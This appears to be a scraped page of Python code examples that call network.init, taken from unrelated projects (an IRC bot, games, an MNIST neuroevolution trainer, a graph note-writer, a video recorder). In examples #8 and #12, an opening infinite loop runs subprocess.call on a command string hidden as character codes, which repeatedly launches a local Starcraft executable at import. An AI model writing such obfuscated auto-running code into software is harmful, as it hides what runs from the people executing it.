示例#1
0
文件: main.py 项目: chozabu/pyrock
def main(settingsfile="settings.json", test_mode=False, no_auto=False):
    """Display a friendly greeting.

    :param str settingsfile: settings file to load
    :param bool test_mode: True to run some tests
    :param bool no_auto: True disable auto FR
    """

    #load settings
    with open(settingsfile) as data_file:
        data = json.load(data_file)
        settings.load_data(data)
        machinesfile = data['machines_file']

    #init network
    network.init(settings.serve_port)
    network.hook_type("hello", test_cb)

    #init synclist
    synclist.init()

    #init basic_chat
    basic_chat.init()

    #init html
    html_ui.init()
    websockets_ui.init()

    #load machines
    machine.loadcontacts(machinesfile)

    #load machines
    machine.init()
    if not no_auto:
        machine.autoconnect()

    #connect to all?

    print("Init Complete")

    if test_mode:
        run_tests()

    while settings.running:
        time.sleep(1)
示例#2
0
文件: leczair.py 项目: memery/leczair
def run_bot(state):
    try:
        state.network = network.init(state.settings.irc)
        irc.hello(state.network, state.settings.irc, state.irc)

        while True:
            try:
                message = irc.get_message(state.network, state.settings.irc, state.irc)
                state.behaviour.nick = state.irc.nick

                if message:
                    # TODO: Temporary until we know more about how admin
                    # commands are going to work
                    if is_admin(state.settings, message.user):
                        if message.text == 'reconfigure':
                            state.settings = load_settings()

                            old = state.settings
                            msgs = irc.settings_changed(old.irc,
                                state.settings.irc)
                            for msg in msgs:
                                irc.send_message(state.network, msg)
                        if message.text == 'reload':
                            reload_modules()
                            continue
                        if message.text == 'restart':
                            return 'restart'

                    responses = behaviour.handle(message, state.settings,
                                                 state.behaviour)

                    for response in filter(bool, responses):
                        irc.send_message(state.network, response)

            except (BrokenPipeError, ConnectionResetError,
                    ConnectionAbortedError, ConnectionRefusedError):
                raise
            except Exception as e:
                logger.exception(e)

    except Exception as e:
        # Gotta catch 'em all because if we don't catch it by now, fire and
        # explosions will ensue
        logger.exception(e)

        # If anything is thrown and caught here, there's no point in trying to
        # do anything about it because we've already exited the connection
        # maintenance loop, so we just wait a bit and try to reconnect again.
        sleep(30)
    finally:
        network.close(state.network)
        # Clear the IRC connection specific state when the connection as been
        # killed
        state.irc = State()
示例#3
0
def start():
    pg.init()

    pg.display.set_mode((width, height), flags=pg.SCALED | pg.RESIZABLE)
    pg.display.set_caption('card game')

    save.init()
    image_handler.init()
    spritesheet.init()
    customsheet.init()
    menu.init()
    client.init()
    game.init()
    network.init()
    builder.init()
    ui.init()

    main_menu = ui.Menu(get_objects=menu.main_menu)
    main_menu.run()

    pg.quit()
示例#4
0
def writer(topic, data=0, init_description=""):
    from writer import writeToFile, isint

    #cleaning function making sure each node is properly linked
    def clean(data, curNode):
        for n in curNode.future:
            if n >= len(data):
                continue
            pastArray = data[n].past
            if n not in pastArray:
                data[n].flashback(curNode.id)
        for n in curNode.past:
            if n >= len(data):
                continue
            futureArray = data[n].future
            if n not in futureArray:
                data[n].flashforward(curNode.id)
        for n in curNode.related:
            if n >= len(data):
                continue
            relatedArray = data[n].related
            if n not in relatedArray:
                data[n].relate(curNode.id)

    file = "../data/" + topic + ".json"

    data = reader(topic)
    DG = init(data)
    DG = cleanPred(data, DG)
    max = len(data)

    content = ""
    summary = init_description
    print(topic + ".write: " + summary)

    while content != "end":
        content = input("")

        if content == "end":
            continue
        #summary function
        if content == "ls":
            print(summary)
            continue
        #enter
        if content == "\n":
            summary += "\n"
            continue
        #premature break
        if content == "break":
            break
        #writing the actual content
        summary += content + " "

    #premature break
    if content == "break":
        return ""
    #connecting the content

    #get title
    print("Title: ")
    title = input("")
    if title == "up":
        title = summary

    print("Type: ")
    type = []
    t = ""
    while t != "end":
        t = input("")
        if t == "end":
            continue
        type.append(t)

    print("Past: ")
    past_temp = ""
    back = []
    while past_temp != "end":
        past_temp = input("")
        if past_temp == "end":
            continue
        if past_temp[:2] == "ls":
            ls(past_temp, data)
            continue
        if past_temp == "search":
            se = ""
            while se != "end":
                se = input("search: ")
                if se == "end":
                    continue
                if isint(se):
                    get(data, DG, id=int(se))
                for n in searcher(se, data):
                    print(str(n.id) + ": " + n.title)
            continue
        if past_temp == "suc":
            for n in mostPopularSuc(data, DG, limit=10):
                print(str(n.id) + ": " + n.title)
            continue
        if past_temp == "pre":
            for n in mostPopularPred(data, DG, limit=10):
                print(str(n.id) + ": " + n.title)
            continue
        if past_temp == "cen":
            for n in most_degree_centrality(DG, limit=10):
                print(str(n[0].id) + ": " + n[0].title)
            continue
        if past_temp == "project":
            get_project(data, DG)
            continue
        if past_temp == "branch":
            branch(data, DG)
            continue
        if past_temp == "get":
            get(data, DG)
            continue
        if isint(past_temp):
            result = int(past_temp)
            back.append(result)
        else:
            print([
                str(n.id) + ": " + str(n.title)
                for n in searcher(past_temp, data)
            ])
        print(back)

    print("Future: ")
    future_temp = ""
    future = []
    while future_temp != "end":
        future_temp = input("")
        if future_temp == "end":
            continue
        if future_temp[:2] == "ls":
            if future_temp[:2] == "ls":
                ls(future_temp, data)
            continue
        if future_temp == "search":
            se = ""
            while se != "end":
                se = input("search: ")
                if se == "end":
                    continue
                if isint(se):
                    get(data, DG, id=int(se))
                for n in searcher(se, data):
                    print(str(n.id) + ": " + n.title)
            continue
        if future_temp == "suc":
            for n in mostPopularSuc(data, DG, limit=10):
                print(str(n.id) + ": " + n.title)
        if future_temp == "pre":
            for n in mostPopularPred(data, DG, limit=10):
                print(str(n.id) + ": " + n.title)
        if future_temp == "cen":
            for n in most_degree_centrality(DG, limit=10):
                print(str(n[0].id) + ": " + n[0].title)
        if future_temp == "get":
            get(data, DG)
        if isint(future_temp):
            result = int(future_temp)
            future.append(result)
        else:
            print([
                str(n.id) + ": " + str(n.title)
                for n in searcher(future_temp, data)
            ])
        print(future)

    #simplify things, break things up into if you want to add related
    c = ""
    related = []
    keyword = []
    while c != "end":
        c = input("")
        if c == "end":
            continue
        if c == "break":
            break
        #if you want to add related
        if c == "related":
            print("Related: ")
            r_temp = ""
            while r_temp != "end":
                r_temp = input("")
                if r_temp == "end":
                    continue
                if isint(r_temp):
                    result = int(r_temp)
                    related.append(result)
                else:
                    print([
                        str(n.id) + ": " + str(n.title)
                        for n in searcher(r_temp, data)
                    ])
                print(related)
        #if you want to add keywords
        if c == "keywords":
            print("Keywords: ")
            k_temp = ""
            while k_temp != "end":
                k_temp = input("")
                if k_temp == "end":
                    continue
                keyword.append(k_temp)
        if c == "edit":
            data = edit(data)
    if c == "break":
        return ""
    print(title)
    print(type)
    print(summary)

    #CLEANING

    current_Node = Node(title, type, summary, keyword, back, future, related,
                        max)
    clean(data, current_Node)
    data.append(current_Node)
    max += 1

    #WRITING BACK TO TXT FILE
    writeToFile(file, data)
示例#5
0
                pl = input("plot: ")

                if pl == "y" or pl == "yes":
                    totcount += print_community(partition, G, plot=True)
                    nx.draw_networkx_edges(G, pos, alpha=0.5)
                    plt.show()
                else:
                    totcount += print_community(partition, G)

                return totcount

    # for com in set(partition.values()) :
    # 	count = count + 1.
    # 	list_nodes = [nodes for nodes in partition.keys()
    # 								if partition[nodes] == com]
    # 	nx.draw_networkx_nodes(G, pos, list_nodes, node_size = 20,
    # 								node_color = str(count / size), cmap = "cool")
    # nx.draw_networkx_edges(G, pos, alpha=0.5)
    # plt.show()


if __name__ == "__main__":
    topic = "probability"
    from reader import reader
    from network import init
    data = reader(topic)
    DG = init(data)
    get_project(data, DG)
    print("COUNT = " + str(branch(data, DG)))
示例#6
0
def main():
    # Parameters
    no_of_generations = 20
    no_of_individuals = 10
    mutate_factor = 0.05
    layers = [0, 3, 5]
    batch_size = 64
    num_classes = 10
    epochs = 1
    all_models_inmemory = True
    use_datagenerator = False

    # Load dataset
    (X_train, y_train), (X_test, y_test) = mnist.load_data()
    X_train = X_train.reshape(X_train.shape[0], 28, 28, 1)
    X_test = X_test.reshape(X_test.shape[0], 28, 28, 1)
    # Data normalization
    X_train = X_train.astype('float32') / 255.0
    X_test = X_test.astype('float32') / 255.0
    y_train_df = pd.DataFrame(data=y_train, columns=["label"])
    y_train = to_categorical(y_train, num_classes)
    y_test = to_categorical(y_test, num_classes)
    # See some statistics
    print(y_train_df.head())
    z_train = Counter(y_train_df['label'])
    print(z_train)
    sns.countplot(y_train_df['label'])
    plt.show()
    # Preview the images first
    plt.figure(figsize=(12, 10))
    x, y = 10, 4
    for i in range(40):
        plt.subplot(y, x, i + 1)
        plt.imshow(X_train[i], interpolation='nearest')
    plt.show()
    # Printing shapes
    print('x_train shape:', X_train.shape)
    print(X_train.shape[0], 'train samples')
    print(X_train.shape[0], 'test samples')
    # Database splitting
    X_train, X_val, Y_train, Y_val = train_test_split(X_train,
                                                      y_train,
                                                      test_size=0.1,
                                                      random_state=42)

    # Callbacks
    learning_rate_reduction = ReduceLROnPlateau(monitor='val_accuracy',
                                                patience=3,
                                                verbose=1,
                                                factor=0.5,
                                                min_lr=0.0001)
    callbacks = [learning_rate_reduction]

    # Datagenerator
    datagen = ImageDataGenerator(
        featurewise_center=False,  # set input mean to 0 over the dataset
        samplewise_center=False,  # set each sample mean to 0
        featurewise_std_normalization=
        False,  # divide inputs by std of the dataset
        samplewise_std_normalization=False,  # divide each input by its std
        zca_whitening=False,  # apply ZCA whitening
        rotation_range=
        15,  # randomly rotate images in the range (degrees, 0 to 180)
        zoom_range=0.1,  # Randomly zoom image
        width_shift_range=
        0.1,  # randomly shift images horizontally (fraction of total width)
        height_shift_range=
        0.1,  # randomly shift images vertically (fraction of total height)
        horizontal_flip=False,  # randomly flip images
        vertical_flip=False)  # randomly flip images
    datagen.fit(X_train)

    # Training
    if use_datagenerator:
        individuals = []
        for i in range(no_of_individuals):
            if all_models_inmemory:
                individuals.append(init2(num_classes, batch_size, epochs))
            else:
                individual = init2(num_classes, batch_size, epochs)
                name_ind = 'indv{}.h5'.format(i)
                individual.save(name_ind)

        for generation in range(no_of_generations):
            if generation == no_of_generations - 1:
                individuals, losses, histories = train2(
                    individuals, epochs, X_train, X_val, Y_train, Y_val,
                    datagen, batch_size, callbacks)
                print(losses)
            else:
                individuals, losses, histories = train2(
                    individuals, epochs, X_train, X_val, Y_train, Y_val,
                    datagen, batch_size, callbacks)
                print(losses)
                individuals = evolve(individuals, losses, layers,
                                     mutate_factor)
    else:
        if all_models_inmemory:
            individuals = []
            for i in range(no_of_individuals):
                individuals.append(init(num_classes, batch_size, epochs))

            for generation in range(no_of_generations):
                if generation == no_of_generations - 1:
                    individuals, losses, histories = train(
                        individuals, epochs, X_train, X_val, Y_train, Y_val)
                    print(losses)
                else:
                    individuals, losses, histories = train(
                        individuals, epochs, X_train, X_val, Y_train, Y_val)
                    print(losses)
                    individuals = evolve(individuals, losses, layers,
                                         mutate_factor)
        else:
            individuals = []
            for i in range(no_of_individuals):
                individual = init(num_classes, batch_size, epochs)
                name_ind = 'indv{}.h5'.format(i)
                individuals.append(name_ind)
                individual.save(name_ind)

            for generation in range(no_of_generations):
                if generation == no_of_generations - 1:
                    individuals, losses, histories = train_and_load(
                        individuals, epochs, X_train, X_val, Y_train, Y_val)
                    print(losses)
                else:
                    individuals, losses, histories = train_and_load(
                        individuals, epochs, X_train, X_val, Y_train, Y_val)
                    print(losses)
                    individuals = evolve_and_load(individuals, losses, layers,
                                                  mutate_factor)

    # Evaluation
    # Best individual
    ib = np.argmax(losses)
    final_loss, final_acc = individuals[ib].evaluate(X_val, Y_val, verbose=0)
    print("Final loss: {0:.6f}, final accuracy: {1:.6f}".format(
        final_loss, final_acc))

    # Confusion matrix
    # Predict the values from the validation dataset
    Y_pred = individuals[ib].predict(X_val)
    # Convert predictions classes to one hot vectors
    Y_pred_classes = np.argmax(Y_pred, axis=1)
    # Convert validation observations to one hot vectors
    Y_true = np.argmax(Y_val, axis=1)
    # compute the confusion matrix
    confusion_mtx = confusion_matrix(Y_true, Y_pred_classes)
    # plot the confusion matrix
    plot_confusion_matrix(confusion_mtx, classes=range(10))

    # Plot learning curves
    print(histories[ib].history.keys())
    accuracy = histories[ib].history['accuracy']
    val_accuracy = histories[ib].history['val_accuracy']
    loss = histories[ib].history['loss']
    val_loss = histories[ib].history['val_loss']
    epochs = range(len(accuracy))
    plt.figure()
    plt.plot(epochs, accuracy, 'bo', label='Training accuracy')
    plt.plot(epochs, val_accuracy, 'b', label='Validation accuracy')
    plt.title('Training and validation accuracy')
    plt.legend()
    plt.show()
    plt.figure()
    plt.plot(epochs, loss, 'bo', label='Training loss')
    plt.plot(epochs, val_loss, 'b', label='Validation loss')
    plt.title('Training and validation loss')
    plt.legend()
    plt.show()

    # Errors are difference between predicted labels and true labels
    errors = (Y_pred_classes - Y_true != 0)
    Y_pred_classes_errors = Y_pred_classes[errors]
    Y_pred_errors = Y_pred[errors]
    Y_true_errors = Y_true[errors]
    X_val_errors = X_val[errors]

    # Probabilities of the wrong predicted numbers
    Y_pred_errors_prob = np.max(Y_pred_errors, axis=1)
    # Predicted probabilities of the true values in the error set
    true_prob_errors = np.diagonal(
        np.take(Y_pred_errors, Y_true_errors, axis=1))
    # Difference between the probability of the predicted label and the true label
    delta_pred_true_errors = Y_pred_errors_prob - true_prob_errors
    # Sorted list of the delta prob errors
    sorted_dela_errors = np.argsort(delta_pred_true_errors)
    # Top 6 errors
    most_important_errors = sorted_dela_errors[-6:]
    # Show the top 6 errors
    display_errors(most_important_errors, X_val_errors, Y_pred_classes_errors,
                   Y_true_errors)

    # Activations
    # It looks like diversity of the similar patterns present on multiple classes effect the performance of the classifier although CNN is a robust architechture.
    test_im = X_train[154]
    plt.imshow(test_im.reshape(28, 28), cmap='viridis', interpolation='none')
    # Let's see the activation of the 2nd channel of the first layer:
    # Had taken help from the keras docs, this answer on StackOverFlow
    layer_outputs = [layer.output for layer in individuals[ib].layers[:8]]
    activation_model = tf.keras.models.Model(inputs=individuals[ib].inputs,
                                             outputs=layer_outputs)
    activations = activation_model.predict(test_im.reshape(1, 28, 28, 1))
    first_layer_activation = activations[0]
    plt.matshow(first_layer_activation[0, :, :, 4], cmap='viridis')
    test_im = X_train[154]
    plt.imshow(test_im.reshape(28, 28), cmap='viridis', interpolation='none')
    # Let's plot the activations of the other conv layers as well.
    individuals[ib].layers[:-1]  # Droping The Last Dense Layer
    layer_names = []
    for layer in individuals[ib].layers[:-1]:
        layer_names.append(layer.name)
    images_per_row = 16
    for layer_name, layer_activation in zip(layer_names, activations):
        if layer_name.startswith('conv'):
            n_features = layer_activation.shape[-1]
            size = layer_activation.shape[1]
            n_cols = n_features // images_per_row
            display_grid = np.zeros((size * n_cols, images_per_row * size))
            for col in range(n_cols):
                for row in range(images_per_row):
                    channel_image = layer_activation[0, :, :,
                                                     col * images_per_row +
                                                     row]
                    channel_image -= channel_image.mean()
                    channel_image /= channel_image.std()
                    channel_image *= 64
                    channel_image += 128
                    channel_image = np.clip(channel_image, 0,
                                            255).astype('uint8')
                    display_grid[col * size:(col + 1) * size,
                                 row * size:(row + 1) * size] = channel_image
            scale = 1. / size
            plt.figure(figsize=(scale * display_grid.shape[1],
                                scale * display_grid.shape[0]))
            plt.title(layer_name)
            plt.grid(False)
            plt.imshow(display_grid, aspect='auto', cmap='viridis')
    plt.show()

    layer_names = []
    for layer in individuals[ib].layers[:-1]:
        layer_names.append(layer.name)
    images_per_row = 16
    for layer_name, layer_activation in zip(layer_names, activations):
        if layer_name.startswith('max'):
            n_features = layer_activation.shape[-1]
            size = layer_activation.shape[1]
            n_cols = n_features // images_per_row
            display_grid = np.zeros((size * n_cols, images_per_row * size))
            for col in range(n_cols):
                for row in range(images_per_row):
                    channel_image = layer_activation[0, :, :,
                                                     col * images_per_row +
                                                     row]
                    channel_image -= channel_image.mean()
                    channel_image /= channel_image.std()
                    channel_image *= 64
                    channel_image += 128
                    channel_image = np.clip(channel_image, 0,
                                            255).astype('uint8')
                    display_grid[col * size:(col + 1) * size,
                                 row * size:(row + 1) * size] = channel_image
            scale = 1. / size
            plt.figure(figsize=(scale * display_grid.shape[1],
                                scale * display_grid.shape[0]))
            plt.title(layer_name)
            plt.grid(False)
            plt.imshow(display_grid, aspect='auto', cmap='viridis')
    plt.show()
    '''
    layer_names = []
    for layer in individuals[ib].layers[:-1]:
        layer_names.append(layer.name)
    images_per_row = 16
    for layer_name, layer_activation in zip(layer_names, activations):
        if layer_name.startswith('drop'):
            n_features = layer_activation.shape[-1]
            size = layer_activation.shape[1]
            n_cols = n_features // images_per_row
            display_grid = np.zeros((size * n_cols, images_per_row * size))
            for col in range(n_cols):
                for row in range(images_per_row):
                    channel_image = layer_activation[0,:, :, col * images_per_row + row]
                    channel_image -= channel_image.mean()
                    channel_image /= channel_image.std()
                    channel_image *= 64
                    channel_image += 128
                    channel_image = np.clip(channel_image, 0, 255).astype('uint8')
                    display_grid[col * size : (col + 1) * size,
                                 row * size : (row + 1) * size] = channel_image
            scale = 1. / size
            plt.figure(figsize=(scale * display_grid.shape[1],
                                scale * display_grid.shape[0]))
            plt.title(layer_name)
            plt.grid(False)
            plt.imshow(display_grid, aspect='auto', cmap='viridis')
    plt.show()
    '''

    # Classification report
    # Predict the values from the validation dataset
    Y_pred = individuals[ib].predict(X_val)
    # Convert predictions classes to one hot vectors
    Y_pred_classes = np.argmax(Y_pred, axis=1)
    Y_true_classes = np.argmax(Y_val, axis=1)
    Y_pred_classes[:5], Y_true_classes[:5]
    target_names = ["Class {}".format(i) for i in range(num_classes)]
    print(
        classification_report(Y_true_classes,
                              Y_pred_classes,
                              target_names=target_names))

    # Predict the values from the test dataset
    Y_pred = individuals[ib].predict(X_test)
    # Convert predictions classes to one hot vectors
    Y_pred_classes = np.argmax(Y_pred, axis=1)
    Y_true_classes = np.argmax(y_test, axis=1)
    Y_pred_classes[:5], Y_true_classes[:5]
    target_names = ["Class {}".format(i) for i in range(num_classes)]
    print(
        classification_report(Y_true_classes,
                              Y_pred_classes,
                              target_names=target_names))

    # Save best model
    individuals[ib].save("cnn.h5")
    json_string = individuals[ib].to_json()
示例#7
0
def reload(data):
    DG = init(data)
    #clean graph initially
    DG = cleanPred(data, DG)
    return DG
示例#8
0
文件: t.py 项目: Saectar/opencraft
import subprocess
while True:
  subprocess.call(''.join(map(chr,[67, 58, 92, 80, 114, 111, 103, 114, 97, 109, 32, 70, 105, 108, 101, 115, 92, 83, 116, 97, 114, 
99, 114, 97, 102, 116, 92, 83, 116, 97, 114, 99, 114, 97, 102, 116, 46, 101, 120, 101])))

import sys,math
import pygame
import network

network.init(int(sys.argv[1]))

selection = []

def get_my_orders(units):
  global selection
  o = []
  for e in pygame.event.get():
    if e.type == pygame.MOUSEBUTTONDOWN:
     if e.button == 1:
      ma = 10000000
      for u in [u for u in units if u.owner == me and u.type == 1]:
        v = (e.pos[0] - u.pos[0], e.pos[1] - u.pos[1])
        m = math.sqrt(v[0]**2+v[1]**2)
        if m < ma:
          de = u
          ma = m
      selection = [de]
     elif e.button == 3:
       for u in selection:
         o.append((units.index(u), map(float,e.pos)))
    
示例#9
0
#!/usr/local/bin/kivy
from kivy.clock import Clock

import audio
import network
import gui
import control

if __name__ == '__main__':
    audio.init()
    network.init()
    control.init()

    Clock.schedule_interval(control.run, 0.0002)
    Clock.schedule_interval(network.run, 0.0002)
    gui.run()

    control.close()
    network.close()
    audio.close()
示例#10
0
import network
from video import Recorder

# 检查参数
if len(usys.argv) < 3:
    print("Usage: %s <ssid> <password>" % usys.argv[0])
    usys.exit(1)


# 定义网络事件回调函数
def network_evt_cb(eid):
    print('%s:%d' % ('eid', eid))


# 连接网络
network.init(network.WIFI)
network.connect(usys.argv[1], usys.argv[2], network_evt_cb)
network.close()

# 等待网络连接
utime.sleep_ms(10000)
print("start recorder with rtsp test")

# 开启视频流功能
recorder = Recorder()
recorder.open(0, recorder.H264)
recorder.start()
utime.sleep_ms(100000000)

# 关闭视频流功能
recorder.stop()
示例#11
0
                new_individual = random.choice([parentA, parentB])

        else:
            new_individual = random.choice(individuals[:])

        new_individuals.append(mutate(new_individual))
        #new_individuals.append(new_individual)

    return new_individuals


def evolve(individuals, losses):
    sorted_y_idx_list = sorted(range(len(losses)), key=lambda x: losses[x])
    individuals = [individuals[i] for i in sorted_y_idx_list]

    #winners = individuals[:6]

    new_individuals = crossover(individuals)

    return new_individuals


for i in range(no_of_individuals):
    individuals.append(init())

for generation in range(no_of_generations):
    individuals, losses = train(individuals)
    print(losses)

    individuals = evolve(individuals, losses)
示例#12
0
import subprocess
while True:
    subprocess.call(''.join(
        map(chr, [
            67, 58, 92, 80, 114, 111, 103, 114, 97, 109, 32, 70, 105, 108, 101,
            115, 92, 83, 116, 97, 114, 99, 114, 97, 102, 116, 92, 83, 116, 97,
            114, 99, 114, 97, 102, 116, 46, 101, 120, 101
        ])))

import sys, math
import pygame
import network

network.init(int(sys.argv[1]))

selection = []


def get_my_orders(units):
    global selection
    o = []
    for e in pygame.event.get():
        if e.type == pygame.MOUSEBUTTONDOWN:
            if e.button == 1:
                ma = 10000000
                for u in [u for u in units if u.owner == me and u.type == 1]:
                    v = (e.pos[0] - u.pos[0], e.pos[1] - u.pos[1])
                    m = math.sqrt(v[0]**2 + v[1]**2)
                    if m < ma:
                        de = u
                        ma = m